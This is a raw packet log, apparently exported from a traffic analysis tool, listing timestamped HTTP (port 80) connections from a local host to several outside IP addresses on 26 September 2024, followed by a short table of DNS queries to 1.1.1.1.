                                                        Sep 26, 2024 15:20:10.845225096 CEST4975980192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:10.849993944 CEST8049759156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:26.515121937 CEST8049757156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:26.515202999 CEST4975780192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:29.027033091 CEST8049758156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:29.027118921 CEST4975880192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:32.339200974 CEST8049759156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:32.341871023 CEST4975980192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:32.345731020 CEST4975980192.168.2.4156.242.132.82
                                                        Sep 26, 2024 15:20:32.350637913 CEST8049759156.242.132.82192.168.2.4
                                                        Sep 26, 2024 15:20:37.664149046 CEST4976080192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:37.669106007 CEST8049760136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:37.669841051 CEST4976080192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:37.681754112 CEST4976080192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:37.686837912 CEST8049760136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:38.295485973 CEST8049760136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:38.295891047 CEST8049760136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:38.295907974 CEST8049760136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:38.296049118 CEST4976080192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:39.191325903 CEST4976080192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:40.213109016 CEST4976180192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:40.218488932 CEST8049761136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:40.218640089 CEST4976180192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:40.229796886 CEST4976180192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:40.234785080 CEST8049761136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:40.838776112 CEST8049761136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:40.838897943 CEST8049761136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:40.838908911 CEST8049761136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:40.838921070 CEST8049761136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:40.838936090 CEST4976180192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:40.838968039 CEST4976180192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:41.741758108 CEST4976180192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:42.757543087 CEST4976280192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:42.762507915 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.762577057 CEST4976280192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:42.775813103 CEST4976280192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:42.780709028 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780783892 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780792952 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780802011 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780807972 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780811071 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780855894 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780878067 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:42.780941963 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:43.486179113 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:43.486202002 CEST8049762136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:43.486315012 CEST4976280192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:44.285320997 CEST4976280192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.303626060 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.308506966 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.308584929 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.317769051 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.322901964 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.913655043 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.913688898 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.913702011 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.913712025 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.913731098 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.913872004 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.913872004 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.914062977 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:45.914122105 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.921566963 CEST4976380192.168.2.4136.143.186.12
                                                        Sep 26, 2024 15:20:45.927223921 CEST8049763136.143.186.12192.168.2.4
                                                        Sep 26, 2024 15:20:51.368025064 CEST4976480192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:51.372844934 CEST8049764199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:51.373070955 CEST4976480192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:51.383663893 CEST4976480192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:51.388499022 CEST8049764199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:52.008403063 CEST8049764199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:52.008460999 CEST8049764199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:52.008549929 CEST4976480192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:52.976560116 CEST4976480192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:53.991295099 CEST4976580192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:53.996697903 CEST8049765199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:53.997034073 CEST4976580192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:54.007343054 CEST4976580192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:54.012254000 CEST8049765199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:54.611762047 CEST8049765199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:54.611860037 CEST8049765199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:54.611913919 CEST4976580192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:55.519367933 CEST4976580192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:56.538556099 CEST4976680192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:56.543536901 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.543615103 CEST4976680192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:56.555665970 CEST4976680192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:56.560584068 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560595036 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560604095 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560617924 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560627937 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560760021 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560770988 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560779095 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:56.560786963 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:57.237291098 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:57.242331028 CEST8049766199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:57.242402077 CEST4976680192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:58.066252947 CEST4976680192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:59.086874962 CEST4976780192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:59.091972113 CEST8049767199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:59.092055082 CEST4976780192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:59.102011919 CEST4976780192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:59.106863976 CEST8049767199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:59.675018072 CEST8049767199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:59.676624060 CEST8049767199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:20:59.676770926 CEST4976780192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:59.681794882 CEST4976780192.168.2.4199.192.21.169
                                                        Sep 26, 2024 15:20:59.687813997 CEST8049767199.192.21.169192.168.2.4
                                                        Sep 26, 2024 15:21:04.714409113 CEST4976880192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:04.719266891 CEST804976844.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:04.719322920 CEST4976880192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:04.734848022 CEST4976880192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:04.739698887 CEST804976844.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:06.238120079 CEST4976880192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:06.243824005 CEST804976844.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:06.245953083 CEST4976880192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:07.256812096 CEST4976980192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:07.261893988 CEST804976944.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:07.262022018 CEST4976980192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:07.272412062 CEST4976980192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:07.277828932 CEST804976944.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:08.785094023 CEST4976980192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:08.790632010 CEST804976944.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:08.790704966 CEST4976980192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:09.806104898 CEST4977080192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:09.811345100 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.811506987 CEST4977080192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:09.825861931 CEST4977080192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:09.830765009 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.830951929 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831001043 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831121922 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831238031 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831377029 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831422091 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831449986 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:09.831475973 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:11.331943989 CEST4977080192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:11.337426901 CEST804977044.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:11.337483883 CEST4977080192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:12.352792978 CEST4977180192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:12.357835054 CEST804977144.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:12.357985973 CEST4977180192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:12.367161989 CEST4977180192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:12.372014999 CEST804977144.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:13.874156952 CEST804977144.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:13.896977901 CEST804977144.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:13.897022963 CEST804977144.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:13.897279024 CEST4977180192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:13.897280931 CEST4977180192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:13.899905920 CEST4977180192.168.2.444.213.25.70
                                                        Sep 26, 2024 15:21:13.906083107 CEST804977144.213.25.70192.168.2.4
                                                        Sep 26, 2024 15:21:27.012345076 CEST4977280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:27.017251968 CEST80497723.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:27.017332077 CEST4977280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:27.034773111 CEST4977280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:27.039668083 CEST80497723.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:28.385516882 CEST80497723.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:28.385598898 CEST4977280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:28.552845001 CEST4977280192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:28.718038082 CEST80497723.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:29.569242001 CEST4977380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:29.574244976 CEST80497733.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:29.583425045 CEST4977380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:29.591430902 CEST4977380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:29.596285105 CEST80497733.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:31.097517967 CEST4977380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:31.103022099 CEST80497733.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:31.103085041 CEST4977380192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:32.116112947 CEST4977480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:32.121196985 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.121299982 CEST4977480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:32.135936022 CEST4977480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:32.141099930 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141138077 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141165018 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141215086 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141242981 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141295910 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141344070 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141375065 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.141402006 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.577963114 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:32.578032017 CEST4977480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:33.648258924 CEST4977480192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:33.653289080 CEST80497743.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:34.664031982 CEST4977580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:34.669553995 CEST80497753.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:34.669646025 CEST4977580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:34.678041935 CEST4977580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:34.683228970 CEST80497753.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:35.143770933 CEST80497753.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:35.143824100 CEST80497753.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:35.143958092 CEST4977580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:35.147399902 CEST4977580192.168.2.43.33.130.190
                                                        Sep 26, 2024 15:21:35.152307987 CEST80497753.33.130.190192.168.2.4
                                                        Sep 26, 2024 15:21:40.462299109 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.467331886 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.468935013 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.479233980 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.484082937 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.926505089 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.926816940 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.926836014 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.926877022 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.928113937 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.928128958 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.928165913 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.929544926 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.929563046 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.929594040 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.931005001 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.931020975 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.931036949 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.931051970 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.931087971 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:40.931930065 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.932431936 CEST804977644.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:40.932487011 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:41.989852905 CEST4977680192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.007499933 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.235096931 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.235176086 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.251950979 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.257841110 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.699990988 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.700345039 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.700360060 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.700519085 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.701028109 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.701042891 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.701147079 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.702547073 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.702564001 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.702794075 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.703864098 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.703880072 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.704061985 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.705300093 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.705432892 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:43.705440998 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.705940962 CEST804977744.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:43.709969997 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:44.754113913 CEST4977780192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:45.776037931 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:45.781083107 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.784984112 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:45.796577930 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:45.802475929 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802489996 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802584887 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802596092 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802628994 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802685022 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802802086 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802813053 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:45.802824974 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.244462967 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.244488955 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.244505882 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.244647026 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:46.245460033 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.245474100 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.245621920 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:46.246922970 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.246941090 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.246993065 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:46.248089075 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.248105049 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.248152971 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:46.249546051 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.249572992 CEST804977844.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:46.249808073 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:47.300892115 CEST4977880192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.319262028 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.325526953 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.332160950 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.335870028 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.340687990 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.790668964 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.790930986 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.790941954 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.791059017 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.791695118 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.791707039 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.791754007 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.793051958 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.793064117 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.793104887 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.794349909 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.794362068 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.794372082 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.794399023 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.794431925 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.796078920 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.796529055 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.796574116 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.796978951 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:48.797023058 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.803169966 CEST4977980192.168.2.444.207.39.65
                                                        Sep 26, 2024 15:21:48.808264971 CEST804977944.207.39.65192.168.2.4
                                                        Sep 26, 2024 15:21:53.973036051 CEST4978080192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:53.978063107 CEST8049780217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:53.980134964 CEST4978080192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:53.993870020 CEST4978080192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:53.998779058 CEST8049780217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:54.581438065 CEST8049780217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:54.581984997 CEST8049780217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:54.582370996 CEST4978080192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:55.503851891 CEST4978080192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:56.523871899 CEST4978180192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:56.528927088 CEST8049781217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:56.533272982 CEST4978180192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:56.543865919 CEST4978180192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:56.548763037 CEST8049781217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:57.158108950 CEST8049781217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:57.158236027 CEST8049781217.70.184.50192.168.2.4
                                                        Sep 26, 2024 15:21:57.158287048 CEST4978180192.168.2.4217.70.184.50
                                                        Sep 26, 2024 15:21:58.379180908 CEST4978180192.168.2.4217.70.184.50
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Sep 26, 2024 15:18:50.111732006 CEST6438953192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:18:50.138664961 CEST53643891.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:19:05.694649935 CEST5479453192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:19:05.715264082 CEST53547941.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:19:21.789643049 CEST5919953192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:19:21.801938057 CEST53591991.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:19:35.038275957 CEST5024753192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:19:35.143299103 CEST53502471.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:19:48.299657106 CEST5964453192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:19:48.474137068 CEST53596441.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:20:01.913448095 CEST6198753192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:20:02.572958946 CEST53619871.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:20:37.351030111 CEST6005453192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:20:37.660027027 CEST53600541.1.1.1192.168.2.4
                                                        Sep 26, 2024 15:20:50.929342985 CEST5854753192.168.2.41.1.1.1
                                                        Sep 26, 2024 15:20:51.365415096 CEST53585471.1.1.1192.168.2.4
